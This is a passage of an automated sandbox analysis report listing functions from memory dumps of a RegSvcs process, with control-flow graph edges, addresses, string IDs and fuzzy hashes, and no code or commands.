                                                                                                                                                                                control_flow_graph 3047 19a8bf0-19a8c11 3090 19a8c13 call 19a89d0 3047->3090 3091 19a8c13 call 19a8bf0 3047->3091 3049 19a8c19-19a8c20 3050 19a8c2c-19a8c4c 3049->3050 3051 19a8c22-19a8c27 3049->3051 3054 19a8c4e-19a8c50 3050->3054 3055 19a8c87-19a8c89 3050->3055 3052 19a8cf5-19a8cfc 3051->3052 3056 19a8c5f-19a8c66 3054->3056 3057 19a8c52-19a8c57 3054->3057 3058 19a8c8b-19a8c91 3055->3058 3059 19a8cf0 3055->3059 3060 19a8cff-19a8d0a 3056->3060 3061 19a8c6c-19a8c85 3056->3061 3057->3056 3058->3059 3062 19a8c93-19a8cae 3058->3062 3059->3052 3068 19a8d0c-19a8d10 3060->3068 3069 19a8d11-19a8d12 3060->3069 3061->3052 3066 19a8cb0-19a8cb2 3062->3066 3067 19a8ce5-19a8ce7 3062->3067 3072 19a8cc1-19a8cc8 3066->3072 3073 19a8cb4-19a8cb9 3066->3073 3067->3059 3074 19a8ce9-19a8cee 3067->3074 3068->3069 3070 19a8d19-19a8d2b call 19a85e8 3069->3070 3071 19a8d14 3069->3071 3078 19a8d39-19a8d42 call 19a85e8 3070->3078 3079 19a8d2d-19a8d37 3070->3079 3071->3070 3072->3060 3076 19a8cca-19a8ce3 3072->3076 3073->3072 3074->3052 3076->3052 3084 19a8d50-19a8d5e call 19a8d90 3078->3084 3085 19a8d44-19a8d4e 3078->3085 3079->3078 3086 19a8d64-19a8d8d 3084->3086 3085->3084 3090->3049 3091->3049
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 4']q$4']q
                                                                                                                                                                                • API String ID: 0-3120983240
                                                                                                                                                                                • Opcode ID: ec9adb06fbb986a8dda147814156993841b6a892b3050df6199398004ba50cab
                                                                                                                                                                                • Instruction ID: 4a0f09c1a24df87834fd828e96706a65bfe97a82b8775ff15c490e9ea9ebccfb
                                                                                                                                                                                • Opcode Fuzzy Hash: ec9adb06fbb986a8dda147814156993841b6a892b3050df6199398004ba50cab
                                                                                                                                                                                • Instruction Fuzzy Hash: 2951A030B012459FEB05DF6DC844B6A7BEAEF88316F54C466E909CB256DB71CC058BE1
                                                                                                                                                                                Function 019A2C88 Relevance: 2.6, Strings: 2, Instructions: 112COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 3093 19a2c88-19a2ca1 3096 19a2cb2-19a2cba 3093->3096 3097 19a2ca3-19a2ca5 3093->3097 3100 19a2cbc-19a2cca 3096->3100 3098 19a2cab-19a2cb0 3097->3098 3099 19a2ca7-19a2ca9 3097->3099 3098->3100 3099->3100 3103 19a2ccc-19a2cce 3100->3103 3104 19a2ce0-19a2ce8 3100->3104 3105 19a2cd0-19a2cd5 3103->3105 3106 19a2cd7-19a2cde 3103->3106 3107 19a2ceb-19a2cee 3104->3107 3105->3107 3106->3107 3109 19a2cf0-19a2cfe 3107->3109 3110 19a2d05-19a2d09 3107->3110 3109->3110 3116 19a2d00 3109->3116 3111 19a2d0b-19a2d19 3110->3111 3112 19a2d22-19a2d25 3110->3112 3111->3112 3122 19a2d1b 3111->3122 3114 19a2d2d-19a2d62 3112->3114 3115 19a2d27-19a2d2b 3112->3115 3123 19a2dc4-19a2dc9 3114->3123 3115->3114 3118 19a2d64-19a2d7b 3115->3118 3116->3110 3120 19a2d7d-19a2d7f 3118->3120 3121 19a2d81-19a2d8d 3118->3121 3120->3123 3124 19a2d8f-19a2d95 3121->3124 3125 19a2d97-19a2da1 3121->3125 3122->3112 3127 19a2da9 3124->3127 3125->3127 3128 19a2da3 3125->3128 3129 19a2db1-19a2dbd 3127->3129 3128->3127 3129->3123
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Xaq$Xaq
                                                                                                                                                                                • API String ID: 0-1488805882
                                                                                                                                                                                • Opcode ID: a6adf740d16db8ac1dad8bae02ce243d801a1064294836a5d269ee3f25779027
                                                                                                                                                                                • Instruction ID: 89ea7f236684ab5c3f1a8e3c31c2158c764e8ee275cc9de32ea09b190aab1fcb
                                                                                                                                                                                • Opcode Fuzzy Hash: a6adf740d16db8ac1dad8bae02ce243d801a1064294836a5d269ee3f25779027
                                                                                                                                                                                • Instruction Fuzzy Hash: 7731C631B002158BEB2D4BAD999867EAAEEBFC4201F544439E91BC7386DF74CC4D86D1
                                                                                                                                                                                Function 019A7EC0 Relevance: 2.6, Strings: 2, Instructions: 108COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: $]q$$]q
                                                                                                                                                                                • API String ID: 0-127220927
                                                                                                                                                                                • Opcode ID: ee81ded530f03f70b8f8da83bda68ad24f0bc819a2b12a8252a2ec0c9994c865
                                                                                                                                                                                • Instruction ID: b63078fcd1a1fa69ec8e552c641b8e2ae77ad349d0b9991fd3f85555c43cd6bf
                                                                                                                                                                                • Opcode Fuzzy Hash: ee81ded530f03f70b8f8da83bda68ad24f0bc819a2b12a8252a2ec0c9994c865
                                                                                                                                                                                • Instruction Fuzzy Hash: B931D4313041418FDB2E8BBC8C96A3D7F6DEF84701B654896E12ACB356DA26DD44C7E1
                                                                                                                                                                                Function 019AD821 Relevance: 2.6, Strings: 2, Instructions: 101COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 8bq$TJbq
                                                                                                                                                                                • API String ID: 0-3440557903
                                                                                                                                                                                • Opcode ID: a7547e71e21e8b0d3141e0f9184ec0c4ed4284072dd6df34a39e6b190a22f170
                                                                                                                                                                                • Instruction ID: f5e97818349af059cf3283037d3c19d773d7d1f0489f26fa4188cb8a5774e99e
                                                                                                                                                                                • Opcode Fuzzy Hash: a7547e71e21e8b0d3141e0f9184ec0c4ed4284072dd6df34a39e6b190a22f170
                                                                                                                                                                                • Instruction Fuzzy Hash: C6311535B401098FCB45DFA8C584E9EBBF6FF88320F595454E509AB365CA30ED89CB91
                                                                                                                                                                                Function 019AD855 Relevance: 2.6, Strings: 2, Instructions: 100COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 8bq$TJbq
                                                                                                                                                                                • API String ID: 0-3440557903
                                                                                                                                                                                • Opcode ID: 6f2f97bb23af707f8b43a641785867dff6dd631ce8faf990283ec66d6be73868
                                                                                                                                                                                • Instruction ID: f204d39c9e4aaf792d72d9d563ab574e4e0758d0a06639d3393faf0c5a1eea8d
                                                                                                                                                                                • Opcode Fuzzy Hash: 6f2f97bb23af707f8b43a641785867dff6dd631ce8faf990283ec66d6be73868
                                                                                                                                                                                • Instruction Fuzzy Hash: EF313434B401098FCB45DFA8C580E9EBBB6FF88320F595454E509AB375CA70EC89CB91
                                                                                                                                                                                Function 068E4944 Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • LdrInitializeThunk.NTDLL(00000000), ref: 068E4A86
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3403801741.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_68e0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 9b753e74402e6768e40cef12dae3b4a6ceb8ef28d6491ccb2fbbd344ccb71f91
                                                                                                                                                                                • Instruction ID: 9f7f64de8a3da03c34686c7dd07ea641ce6f6d095299e2461336abdc812c5ccc
                                                                                                                                                                                • Opcode Fuzzy Hash: 9b753e74402e6768e40cef12dae3b4a6ceb8ef28d6491ccb2fbbd344ccb71f91
                                                                                                                                                                                • Instruction Fuzzy Hash: 0A1156B4E011098FDB44CBA8D884AEDBBF5EB89324F50C165E818E7242DB30E941CBA4
                                                                                                                                                                                Function 019A0B20 Relevance: 1.5, Strings: 1, Instructions: 210COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: LR]q
                                                                                                                                                                                • API String ID: 0-3081347316
                                                                                                                                                                                • Opcode ID: fe0c2e501f190b0d0029458efcf1878ed3cff2138470e3b5ab13b2207eff4f13
                                                                                                                                                                                • Instruction ID: 4c4ba3a261398aee16e04bea16ab5f26ed00133b175e6bb1e8f935dd6fcd3c20
                                                                                                                                                                                • Opcode Fuzzy Hash: fe0c2e501f190b0d0029458efcf1878ed3cff2138470e3b5ab13b2207eff4f13
                                                                                                                                                                                • Instruction Fuzzy Hash: 4FA10D74A0020ACFCF14DFA8EA859AEBBB9FF48304F105569E505A7365DB39AD05CF81
                                                                                                                                                                                Function 019A0B30 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: LR]q
                                                                                                                                                                                • API String ID: 0-3081347316
                                                                                                                                                                                • Opcode ID: 2d998a14a91cd49d6309461ef98130ab6503449925f1fe2aa816afde1e61efe1
                                                                                                                                                                                • Instruction ID: cd78c17e6824194be121c08b1a635c862687217b79234b03726ceb2ec10f2616
                                                                                                                                                                                • Opcode Fuzzy Hash: 2d998a14a91cd49d6309461ef98130ab6503449925f1fe2aa816afde1e61efe1
                                                                                                                                                                                • Instruction Fuzzy Hash: 63A10D74A0020ACFCF14DFA8EA859AEBBB9FF48300F105569E515A7364DB39AD05CF81
                                                                                                                                                                                Function 019ADBE8 Relevance: 1.4, Strings: 1, Instructions: 163COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Haq
                                                                                                                                                                                • API String ID: 0-725504367
                                                                                                                                                                                • Opcode ID: 354d6f0f747f0380d5e78791ef6297cd4234101d704da2d7ac8bdce1071b84e3
                                                                                                                                                                                • Instruction ID: 0d4a662dd477ddde7cbcb87fedea146f00f8297c8f4654a883fa5a20ca16c1fc
                                                                                                                                                                                • Opcode Fuzzy Hash: 354d6f0f747f0380d5e78791ef6297cd4234101d704da2d7ac8bdce1071b84e3
                                                                                                                                                                                • Instruction Fuzzy Hash: 47512535B043455FD706EBB89C44AAE3FFAAF96201B8444BAE509CB792DE708C06C7D1
                                                                                                                                                                                Function 019A9EC0 Relevance: 1.4, Strings: 1, Instructions: 125COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: (o]q
                                                                                                                                                                                • API String ID: 0-794736227
                                                                                                                                                                                • Opcode ID: 45fe3e116e65fcfe6cfdc60a28336db13c848b90521e0fc72239b84672bd12ca
                                                                                                                                                                                • Instruction ID: e3547dcd2ecd087d6eed63dc492a2062a19fcab23e51d8260304cc00f8844ec7
                                                                                                                                                                                • Opcode Fuzzy Hash: 45fe3e116e65fcfe6cfdc60a28336db13c848b90521e0fc72239b84672bd12ca
                                                                                                                                                                                • Instruction Fuzzy Hash: C141D131B042148FDB149B68D898AAEBFBABFC8711F548469E90AD7391DE719C05CB90
                                                                                                                                                                                Function 019ADD99 Relevance: 1.3, Strings: 1, Instructions: 98COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Haq
                                                                                                                                                                                • API String ID: 0-725504367
                                                                                                                                                                                • Opcode ID: f53a2e3b06d47f535ee385c7118c9279325ac93a3dd442a0cfadf42e067b4540
                                                                                                                                                                                • Instruction ID: 7d805bc10e930e3013d3c6ada0591e468eaf6b3390e0612794691054d67784b3
                                                                                                                                                                                • Opcode Fuzzy Hash: f53a2e3b06d47f535ee385c7118c9279325ac93a3dd442a0cfadf42e067b4540
                                                                                                                                                                                • Instruction Fuzzy Hash: 87310B317042459FD7069BBCC8546AD7FFAEFA5210F5880A5D409CBA96DA319D0AC3C0
                                                                                                                                                                                Function 019AAC3D Relevance: .4, Instructions: 411COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 7cdbe075af5364088e69ea7b2adb3831e8b718c3b51454250d788cc2f4daf503
                                                                                                                                                                                • Instruction ID: 0e6c7331606d560c67065da99f73d517d151acce55f4620b408f56cad57abbd5
                                                                                                                                                                                • Opcode Fuzzy Hash: 7cdbe075af5364088e69ea7b2adb3831e8b718c3b51454250d788cc2f4daf503
                                                                                                                                                                                • Instruction Fuzzy Hash: D781F631644215CFCB16CF2CC488A69BBB9FF45316B8A8495E91E9B366C731EC48CBD0
                                                                                                                                                                                Function 019A89D0 Relevance: .2, Instructions: 243COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a046a1e2e025a3518003abdb7b196c4cf386828c99323016ac409419ba8460e4
                                                                                                                                                                                • Instruction ID: e15cc2ae0369f0c5534a2814394cfa636c9ee94ba1fbe749636ac7688806ef4d
                                                                                                                                                                                • Opcode Fuzzy Hash: a046a1e2e025a3518003abdb7b196c4cf386828c99323016ac409419ba8460e4
                                                                                                                                                                                • Instruction Fuzzy Hash: 729107719056069FC711CF2CC88499ABBB9FF85322B94CA66E95C97352D331EC1AC7E0
                                                                                                                                                                                Function 019ADF40 Relevance: .2, Instructions: 230COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 620dd435cf5c8547b27f1b5205ace018926cecf95b623786ff0810421ac15a05
                                                                                                                                                                                • Instruction ID: bfd447f10342f99cfde770a10d562c5f5a60d69bc6cb64d8150f83f8105cac3b
                                                                                                                                                                                • Opcode Fuzzy Hash: 620dd435cf5c8547b27f1b5205ace018926cecf95b623786ff0810421ac15a05
                                                                                                                                                                                • Instruction Fuzzy Hash: 8D61F472B042259FC714DAACD8449ABBBF9FBC8325B94853AE51DD7341D731E80987E0
                                                                                                                                                                                Function 019A5068 Relevance: .2, Instructions: 208COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: fff3c55f85a9033b750510463fe1e1bcc4bcc9d9abd0bbc00ca3bd98d438d4be
                                                                                                                                                                                • Instruction ID: 8464dea07fb118569bfe76246db56512ce0a47f10ebaf3f1a2634ec9dfc6a89a
                                                                                                                                                                                • Opcode Fuzzy Hash: fff3c55f85a9033b750510463fe1e1bcc4bcc9d9abd0bbc00ca3bd98d438d4be
                                                                                                                                                                                • Instruction Fuzzy Hash: 276116707042118FE7169F38C898B3A7BAAAF85311F568469E90ACB395DF34DC4AC7C1
                                                                                                                                                                                Function 019A6C98 Relevance: .2, Instructions: 201COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 2143547de0776335be181019226e3928d0c5d43d843741c4b253a693efb2154a
                                                                                                                                                                                • Instruction ID: 8a4e6f060f12935f9e66719e657e74e076eaf142dc1a53b06361debf90c23db3
                                                                                                                                                                                • Opcode Fuzzy Hash: 2143547de0776335be181019226e3928d0c5d43d843741c4b253a693efb2154a
                                                                                                                                                                                • Instruction Fuzzy Hash: FD7148317002058FDB15DF2CC898A6E7BF9AF49641B6944A9EA09CB3B1DB70EC55CB90
                                                                                                                                                                                Function 019AB358 Relevance: .2, Instructions: 162COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 88c233efd757a65183df9c8738f98fef96a6259cca8c8fd299aed42b405f6dcc
                                                                                                                                                                                • Instruction ID: e09c830aac6716290af471140601b9334ab78543fbb099ad574b0c5c65f2fa58
                                                                                                                                                                                • Opcode Fuzzy Hash: 88c233efd757a65183df9c8738f98fef96a6259cca8c8fd299aed42b405f6dcc
                                                                                                                                                                                • Instruction Fuzzy Hash: D041BB374B22128FE7016B31E5AFBAA7F68EB17316754ED11BC1AD1705DF3E8049AA01
                                                                                                                                                                                Function 019AB108 Relevance: .1, Instructions: 135COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 29d03e7d6de5b6a11cf6cdd9aa0fe77333af4910693370eb489050ac4a08a4b9
                                                                                                                                                                                • Instruction ID: 37e1831c49ee9ba4b7a105c55431f5e9e41df386b0fe77d42b8999be9b4e81e9
                                                                                                                                                                                • Opcode Fuzzy Hash: 29d03e7d6de5b6a11cf6cdd9aa0fe77333af4910693370eb489050ac4a08a4b9
                                                                                                                                                                                • Instruction Fuzzy Hash: C341F331905345CFCB12AFB8E8585ADBF74FF0B312F845956E40AE7211EB31A949CB90
                                                                                                                                                                                Function 019A3168 Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 169c824efaca53e491e404043421ee97f8316d9cb19863ced925302da4ad2c00
                                                                                                                                                                                • Instruction ID: e3e369711be119d4bb814242ca85055aba5c14dd8e2440463cbb5e0c05409867
                                                                                                                                                                                • Opcode Fuzzy Hash: 169c824efaca53e491e404043421ee97f8316d9cb19863ced925302da4ad2c00
                                                                                                                                                                                • Instruction Fuzzy Hash: 2B51A774E01208CFCB18DFA9D58089EBBB6FF89310F649469E409AB364DB35AD45CF40
                                                                                                                                                                                Function 019A92C3 Relevance: .1, Instructions: 125COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 82acbee04c321e71c8c2425b68bc172bbfee7ab7024f5f2461c378930ae24e8e
                                                                                                                                                                                • Instruction ID: 5298753d83adaf56d49d8ffb135254d33ab96d3ae7629ef08ce965d76cbe4979
                                                                                                                                                                                • Opcode Fuzzy Hash: 82acbee04c321e71c8c2425b68bc172bbfee7ab7024f5f2461c378930ae24e8e
                                                                                                                                                                                • Instruction Fuzzy Hash: D641D231A04259DFCF12CFA8C880A9DBFF6FF49318F448555E9099B2A2D735E918CB90
                                                                                                                                                                                Function 019AB2E0 Relevance: .1, Instructions: 118COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5750a616a242eeccd92088aa58f458fdef3e16aefb4209ff711270d9ca804ba2
                                                                                                                                                                                • Instruction ID: 0679bf96e354014b18f5fb203b982043573679296c667a6276dc59288392c127
                                                                                                                                                                                • Opcode Fuzzy Hash: 5750a616a242eeccd92088aa58f458fdef3e16aefb4209ff711270d9ca804ba2
                                                                                                                                                                                • Instruction Fuzzy Hash: 583112344367468FF2102F74A5AEBAA7FA8FB1B31BB44AD51F90B81251DF344048EA52
                                                                                                                                                                                Function 019AC8B0 Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5dbda0f8cbf8c14f55c3b14a30aea98097e85700579e1b31d24d2d968a379614
                                                                                                                                                                                • Instruction ID: 393b87974fbbe02674205ceef6abfcce8e222450a53c4c20b20e4b1f1ae1360f
                                                                                                                                                                                • Opcode Fuzzy Hash: 5dbda0f8cbf8c14f55c3b14a30aea98097e85700579e1b31d24d2d968a379614
                                                                                                                                                                                • Instruction Fuzzy Hash: F331C9316002495FDB149F78E858AEE7FA9FF84310B448539E85A8B355DF349D05C7E1
                                                                                                                                                                                Function 019A4613 Relevance: .1, Instructions: 103COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e61f9bebfe4a0bd2184138b0cdf7823e11453377b5d9a109859ba1da5ade2931
                                                                                                                                                                                • Instruction ID: 6f6be73eaee2c5d3762f84138d74523cb785ac06aa3d96e8133d973539fa6a44
                                                                                                                                                                                • Opcode Fuzzy Hash: e61f9bebfe4a0bd2184138b0cdf7823e11453377b5d9a109859ba1da5ade2931
                                                                                                                                                                                • Instruction Fuzzy Hash: D941DD7160010AEFDF029F64D489BBE7BBAFF58301F448028F90987244CBB9C965EB90
                                                                                                                                                                                Function 019AB368 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
